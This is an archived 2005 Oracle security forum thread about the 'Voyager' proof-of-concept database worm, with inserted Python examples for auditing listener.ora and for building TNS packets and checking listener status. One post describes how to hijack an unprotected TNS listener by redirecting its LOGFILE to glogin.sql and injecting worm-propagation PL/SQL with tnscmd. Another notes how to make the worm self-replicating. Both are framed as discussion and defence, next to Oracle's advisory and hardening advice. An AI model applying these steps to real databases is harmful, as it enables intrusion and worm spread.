Topic: Oracle Voyager Worm (Read 23250 times)
Pete Finnigan
PeteFinnigan.com Administrator
Oracle Security is easier if you design for it
Posts: 309
Re: Oracle Voyager Worm
« Reply #2 on: Nov 1st, 2005, 8:49pm »
Ivan,

I am referring to the TNS listener password. I found a possibility to circumvent the local OS authentication (already reported to Oracle, Oracle bug ID: 6454409). If you use a password-protected listener (with a strong password) your systems are safe (AFAIK). Set the following value in the listener.ora and restart the listener:

    LOCAL_OS_AUTHENTICATION_<LISTENER_NAME> = OFF

Hope this helps...

Regards
Alexander
Pete Finnigan (email:pete@petefinnigan.com) Oracle Security Web site: http://www.petefinnigan.com Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
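The check a DBA would script to confirm that the setting above is actually in place, as an added example (not code from this thread or from Oracle). It parses the top-level parameters of a listener.ora and, for every listener the file defines, reports whether LOCAL_OS_AUTHENTICATION_<name> is OFF and PASSWORDS_<name> is set. It also checks ADMIN_RESTRICTIONS_<name> = ON, a parameter the thread does not mention but which is the standard way to refuse runtime SET commands against a listener. Both listener.ora samples are constructed for the example; the password hash is a placeholder.

```python
"""Audit listener.ora for the listener-protection settings (added example)."""
import re

# Constructed sample: an unhardened listener.ora, not taken from the thread.
WEAK_LISTENER_ORA = """
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost)(PORT = 1521))
    )
  )

SID_LIST_LISTENER =
  (SID_LIST =
    (SID_DESC =
      (SID_NAME = ORCL)
      (ORACLE_HOME = /u01/app/oracle/product/10r2/db_1)
    )
  )
"""

# Constructed sample: the same file with the settings applied.  PASSWORDS_ holds
# the hash written by "lsnrctl CHANGE_PASSWORD"; the value here is a placeholder.
HARDENED_LISTENER_ORA = WEAK_LISTENER_ORA + """
# Require the listener password even from the local oracle OS account.
LOCAL_OS_AUTHENTICATION_LISTENER = OFF
PASSWORDS_LISTENER = 0123456789ABCDEF
# Not in the thread: refuse runtime SET commands (e.g. SET LOG_FILE) entirely.
ADMIN_RESTRICTIONS_LISTENER = ON
"""

_PARAM = re.compile(r"([A-Za-z_][A-Za-z0-9_]*)\s*=\s*")


def parse_listener_ora(text):
    """Return {NAME: value} for the top-level NAME = value entries.

    A value starting with '(' runs until its parentheses balance, so nested
    DESCRIPTION trees are kept whole and their inner (KEY = value) pairs are
    not mistaken for top-level parameters.  Lines starting with '#' are ignored.
    """
    body = "\n".join(line for line in text.splitlines()
                     if not line.lstrip().startswith("#"))
    params, pos = {}, 0
    while (m := _PARAM.search(body, pos)):
        name, pos = m.group(1).upper(), m.end()
        if body.startswith("(", pos):
            depth, end = 0, pos
            while end < len(body):
                depth += {"(": 1, ")": -1}.get(body[end], 0)
                end += 1
                if depth == 0:
                    break
            params[name], pos = body[pos:end], end
        else:
            end = body.find("\n", pos)
            end = len(body) if end == -1 else end
            params[name], pos = body[pos:end].strip(), end
    return params


def listener_names(params):
    """Listeners are the top-level parameters whose value is an address tree."""
    return sorted(n for n, v in params.items() if v.startswith("(DESCRIPTION"))


def audit_listener(params, name):
    """Return the findings for one listener; an empty list means it passes."""
    findings = []
    if params.get(f"LOCAL_OS_AUTHENTICATION_{name}", "ON").upper() != "OFF":
        findings.append(f"LOCAL_OS_AUTHENTICATION_{name} is not OFF (local OS auth still trusted)")
    if not params.get(f"PASSWORDS_{name}"):
        findings.append(f"PASSWORDS_{name} is unset (listener has no password)")
    if params.get(f"ADMIN_RESTRICTIONS_{name}", "OFF").upper() != "ON":
        findings.append(f"ADMIN_RESTRICTIONS_{name} is not ON (runtime SET commands allowed)")
    return findings


def audit(text):
    """Map every listener defined in the file to its list of findings."""
    params = parse_listener_ora(text)
    return {name: audit_listener(params, name) for name in listener_names(params)}


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_LISTENER_ORA), ("hardened", HARDENED_LISTENER_ORA)):
        for name, findings in audit(cfg).items():
            print(f"{label} {name}: {findings or 'OK'}")
```

Run it against the real $ORACLE_HOME/network/admin/listener.ora after the restart; a listener that still reports any finding has not been protected in the way the post describes. The parser deliberately does not descend into the DESCRIPTION trees, because the only parameters that matter for this check are top-level ones suffixed with the listener name.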
Re: Oracle Voyager Worm
« Reply #4 on: Nov 2nd, 2005, 8:21pm »
Alexander,

I think the "proof-of-concept" worm is based on the tnscmd.pl tool and it can't work against 10G Oracle databases because the TNS header has changed. Using Ethereal I've changed tnscmd.pl to work against 10G listeners. Maybe it is off-topic, but if people want to play with the "proof-of-concept" worm they have to change the "vRequest" string in the worm's code to experiment with 10G databases. If someone wants my adapted version of tnscmd.pl let me know and I'll send it to you.

Ivan
Re: Oracle Voyager Worm
« Reply #5 on: Nov 4th, 2005, 3:18am »
It may not be good behaviour to criticize one's host, but I don't understand the lapse of judgement that resulted in describing Voyager as a worm. According to both Wikipedia and FOLDOC a worm needs to be self-propagating, which Voyager is not. IMHO, Voyager is not a breakthrough, proof-of-concept worm. Rather, Voyager is a very limited and poorly written scanner, which has received far more notice than it deserves. We should speak no more of Voyager: there are a number of better scanners available for download from this site.

Steven
Re: Oracle Voyager Worm
« Reply #6 on: Nov 4th, 2005, 9:12am »
Ensslen,

Don't be afraid to criticize. Don't forget it is a proof-of-concept worm. It can easily be adapted to be self-propagating. I agree that there are many requirements to be met before such a worm could be effective:

1) the use of default passwords (I read somewhere an article in which Alexander says that at least 60 percent of all customers have at least a few databases with default passwords!),
2) finding a default uc/password combination with enough privileges to make it self-propagating,
3) an unprotected listener (if people still have default passwords, the chances that they have unprotected listeners are big).

If 1 is met but 2 is not, then you could still use 3 to make the worm self-propagating: if they have an unprotected listener, then instead of just using it to discover instances you could use it to adapt the glogin.sql, for example. Let me show how you can do it with tnscmd.pl:

Code:
    oracle@Asus:~/Worm > ./tnscmd10g.pl status -h 10.0.0.153 --10G --indent
    sending (CONNECT_DATA=(CID=(PROGRAM=)(HOST=linux)(USER=oracle))(COMMAND=status)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=169869568)) to 10.0.0.153:1521
    writing 181 bytes
    reading
    .M.......9.........-.
    ..........
      DESCRIPTION=
        TMP=
        VSNNUM=169869568
        ERR=0
    .
    ........
      DESCRIPTION=
        TMP=
        VSNNUM=169869568
        ERR=0
        ALIAS=LISTENER
        SECURITY=OFF
        VERSION=TNSLSNR for Linux: Version 10.2.0.1.0 - Production
        START_DATE=04-NOV-2005 09:34:03
        SIDNUM=1
        LOGFILE=/u01/app/oracle/product/10r2/db_1/network/log/listener.log
        PRMFILE=/u01/app/oracle/product/10r2/db_1/network/admin/listener.ora
        TRACING=off
        UPTIME=4433
        SNMP=OFF
        PID=13232
        START_DATE_NUM=2005-11-04 09:34:03

From the above information I know where to find the glogin.sql file: in /u01/app/oracle/product/10r2/db_1/sqlplus/admin/glogin.sql. The above listener is using the default location for the LOGFILE. Using the same tnscmd tool I can reset the listener's LOGFILE to .../glogin.sql and then I can use tnscmd to fill the glogin.sql with the statements to propagate the worm:

Code:
    tnscmd10g.pl -h 10.0.0.151 --10G --rawcmd "(CONNECT_DATA=((<here your pl/sql code to propagate>"

After creating and filling glogin.sql I can reset the LOGFILE to its original value. The site is now infected with code to make the worm propagate itself. The code that is used by tnscmd is already inside the "proof-of-concept" worm (except for the adaptations needed by 10G). Another adaptation would be the correct calculation of the subnet mask to scan all the systems in the network. To make it jump to an external network seems very difficult. You hardly see db-links between organizations. But most organizations have many databases.

My conclusion is that this proof-of-concept worm deserves to be discussed.

Ivan
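Two points from the last two posts, as an added example that is not code from the thread, from tnscmd.pl or from the worm: what the TNS CONNECT packet that carries a listener command actually looks like (the "vRequest" string Ivan had to change), and how to read a STATUS reply for the two things a defender should care about, SECURITY=OFF and a LOGFILE that has been redirected away from the listener log. The header layout follows the public TNS CONNECT packet format (8-byte header, 42 bytes of connect fields, 8 reserved bytes, connect data at offset 58) with the SDU/TDU/NT-characteristics values tnscmd.pl sends; version 310 is the value tnscmd.pl was written with, and 313 is assumed here to be the 10G value the --10G variant switches to. The reply text is constructed sample data in raw NV form, not a capture; nothing is sent on the network.

```python
"""TNS CONNECT packet builder and listener STATUS reply checker (added example).

Layout: 8-byte TNS header, 42 bytes of connect fields, 8 reserved bytes, then
the connect data at offset 58.  Version 313 for 10G is an assumption.
"""
import re
import struct

TNS_TYPE_CONNECT = 1
CONNECT_DATA_OFFSET = 58

# The listener command from Ivan's session above, exactly as tnscmd.pl sends it.
STATUS_COMMAND = ("(CONNECT_DATA=(CID=(PROGRAM=)(HOST=linux)(USER=oracle))"
                  "(COMMAND=status)(ARGUMENTS=64)(SERVICE=LISTENER)"
                  "(VERSION=169869568))")

# Constructed reply in raw NV form (tnscmd --indent strips the parentheses).
# LOGFILE has been pointed at glogin.sql, the redirection the post describes.
SAMPLE_STATUS_REPLY = (
    "(DESCRIPTION=(TMP=)(VSNNUM=169869568)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)"
    "(VERSION=TNSLSNR for Linux: Version 10.2.0.1.0 - Production)"
    "(START_DATE=04-NOV-2005 09:34:03)(SIDNUM=1)"
    "(LOGFILE=/u01/app/oracle/product/10r2/db_1/sqlplus/admin/glogin.sql)"
    "(PRMFILE=/u01/app/oracle/product/10r2/db_1/network/admin/listener.ora)"
    "(TRACING=off)(UPTIME=4433)(SNMP=OFF)(PID=13232))"
)


def build_connect_packet(connect_data, version=310, version_compatible=300):
    """Return the bytes of a TNS CONNECT packet carrying connect_data."""
    data = connect_data.encode("ascii")
    fields = struct.pack(
        ">10H",
        version,              # protocol version the client speaks
        version_compatible,   # lowest version the client accepts
        0,                    # service options
        2048,                 # SDU size
        32767,                # TDU size
        0x7F08,               # NT protocol characteristics
        0,                    # line turnaround value
        1,                    # "value of 1 in hardware" (byte-order probe)
        len(data),            # length of connect data
        CONNECT_DATA_OFFSET,  # offset of connect data from packet start
    )
    fields += struct.pack(">I", 0)  # max receivable connect data
    fields += bytes(2)              # connect flags 0 and 1
    fields += bytes(8)              # trace cross-facility items 1 and 2
    fields += bytes(8)              # trace unique connection id
    fields += bytes(8)              # reserved; keeps connect data at offset 58
    total = 8 + len(fields) + len(data)
    header = struct.pack(">HHBBH", total, 0, TNS_TYPE_CONNECT, 0, 0)
    return header + fields + data


def parse_connect_packet(pkt):
    """Decode the header fields needed to check that a CONNECT packet round-trips."""
    total, _chk, ptype, _flags, _hchk = struct.unpack(">HHBBH", pkt[:8])
    if ptype != TNS_TYPE_CONNECT or total != len(pkt):
        raise ValueError("not a well-formed TNS CONNECT packet")
    version, compatible = struct.unpack(">HH", pkt[8:12])
    cd_len, cd_off = struct.unpack(">HH", pkt[24:28])
    return {
        "version": version,
        "compatible": compatible,
        "connect_data": pkt[cd_off:cd_off + cd_len].decode("ascii"),
    }


def check_status_reply(nv_text):
    """Pull the (KEY=value) pairs out of a STATUS reply and flag weak settings."""
    pairs = dict(re.findall(r"\((\w+)=([^()]*)\)", nv_text))
    findings = []
    if pairs.get("SECURITY", "").upper() == "OFF":
        findings.append("SECURITY=OFF: listener accepts commands without a password")
    logfile = pairs.get("LOGFILE", "")
    if logfile and not logfile.lower().endswith(".log"):
        findings.append(f"LOGFILE={logfile}: log redirected to a non-log file")
    return pairs, findings


if __name__ == "__main__":
    for ver in (310, 313):
        pkt = build_connect_packet(STATUS_COMMAND, version=ver)
        print(ver, len(pkt), "bytes, version", parse_connect_packet(pkt)["version"])
    for finding in check_status_reply(SAMPLE_STATUS_REPLY)[1]:
        print("FINDING:", finding)
```

The 123-byte STATUS command plus the 58-byte header gives the 181 bytes that tnscmd reports as "writing 181 bytes" in the session above, which is a quick way to confirm the layout. On the defensive side, a listener that answers SECURITY=OFF and shows a LOGFILE outside network/log is exactly the state the post describes; a monitoring job that runs check_status_reply over the output of lsnrctl status would catch the redirection while it is in progress.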
Re: Oracle Voyager Worm
« Reply #7 on: Nov 4th, 2005, 6:02pm »
ISaez,

I am not trying to challenge anyone, I'm just trying to clarify. I agree that there are many different ways of hacking Oracle databases, and that these can be used to create worms. I also agree that the technique that you describe in your most recent post could be used to make a worm. I may be stubborn, but none of this is news. That Oracle databases have exploits is well publicized. That these exploits could be scripted into a worm is common sense. But Voyager does not prove the concept.

Steven

(And I would caution you to be careful with what you post. The courts in many jurisdictions are technophobic and may not distinguish between explaining worms and encouraging their development.)
Re: Oracle Voyager Worm
« Reply #9 on: Nov 4th, 2005, 7:03pm »
Hi Guys,

The post says that it is incomplete and, all right, it is not actually a worm as it doesn't replicate, but the concept is there to show that it is possible to create an Oracle-based worm in a similar vein to the Slammer worm that plagued SQL Server. I think it is valid to describe it as a worm as it is a concept only. The other thing to remember is that currently - in my opinion - a Slammer-type worm could not plague Oracle systems to the same effect as Slammer did, simply because there is only a fraction of the number of Oracle databases exposed to the net than there were SQL Server databases.

cheers
Pete
Advice regarding the so-called Oracle Voyager Worm
« Reply #10 on: Nov 5th, 2005, 7:42am »
Today I've got this email from Oracle.

Regards
Alex

-----Original Message-----
From: Oracle Global Product Security [mailto:replies@oracle-mail.com]
Sent: Saturday, 5 November 2005 06:23
To: Kornbrust, Alexander
Subject: Advice regarding the so-called "Oracle Voyager Worm"

Dear Oracle customer,

Oracle Global Product Security has investigated the recent Internet publication of the so-called "Oracle Voyager Worm" that is designed to target Oracle databases. In its current form, the code is incomplete and poses no immediate threat to Oracle customers. The code does not expose or attempt to exploit an Oracle product security vulnerability. Instead, the code outlines an attack against Oracle database systems that have been configured insecurely.

Oracle considers adherence to industry standard security practices the best way for customers to protect their database systems. A MetaLink note is now available that outlines the minimum essential steps customers should take to mitigate future attempted attacks against their Oracle databases. Customers who already follow industry standard security best practices, including those who have hardened or locked down their database systems, may still benefit from reviewing the MetaLink note.

The MetaLink Doc ID is 340009.1:
http://metalink.oracle.com/metalink/plsql/showdoc?db=NOT&id=340009.1

Additional references:
http://www.oracle.com/technology/deploy/security/db_security/index.html
http://www.oracle.com/technology/deploy/security/pdf/twp_security_checklist_db_database.pdf

Sincerely,
Oracle Global Product Security

PLEASE DO NOT REPLY TO THIS E-MAIL. This address is not monitored.
Re: Oracle Voyager Worm
« Reply #11 on: Nov 6th, 2005, 11:30pm »
It seems (to me) to be a valid proof of concept. Admittedly, the code currently written only attempts to create a table at the end of the DB link, but using DBMS_METADATA (or even simply selecting from user_source) it could easily re-extract its own source code and so create a copy of itself at the destination. The only other major missing component of the worm is that it doesn't attempt to execute anything. A worm should not only try to copy itself but try to get that copy running. DBMS_JOB is the obvious mechanism, and is a prime candidate for lockdown.
Re: Advice regarding the so-called Oracle Voyager Worm
« Reply #12 on: Nov 7th, 2005, 8:02am »
on Nov 5th, 2005, 7:42am, kornbrust wrote:
    Today I've got this email from Oracle. Regards Alex
    -----Original Message-----
    From: Oracle Global Product Security [mailto:replies@oracle-mail.com]
    Sent: Saturday, 5 November 2005 06:23
    To: Kornbrust, Alexander
    Subject: Advice regarding the so-called "Oracle Voyager Worm"
    ......
    Customers who already follow industry standard security best practices, including those who have hardened or locked down their database systems, may still benefit from reviewing the MetaLink note.
    ....

To which "industry standard security best practices" is Oracle referring?

Ivan
|
Re: Oracle Voyager Worm
« Reply #13 on: Nov 7th, 2005, 2:45pm » |
Quote | Modify
|
Hi Ivan,

This is an interesting point that you have raised. I am not aware of an industry standard for securing Oracle, except perhaps my book or the SANS course or the CIS benchmark. I guess that they might be referring to more high-level practices such as least-privilege principles, security in depth, etc.

I talked about the same issue in this forum some time ago and also in my blog - the issue of creating an open standard for securing an Oracle database. I have installed a wiki on this site. It needs some initial configuration and then we can get going. I think that it would be a worthwhile endeavor to produce a list of issues, vulnerabilities, configuration issues, bugs and best practices etc. My idea was to have a main page and then the categories such as configuration, bugs, best practices, privileges, OS issues, network issues etc. Then each category would list each separate issue and each would have its own page with a short description, fix, issue, what tools already check for the issue and so on. My final thought was to then be able to collate a complete checklist from this, or a standard for hardening or building Oracle. I chose to use a wiki so that others can collaborate and add to it.

cheers
pete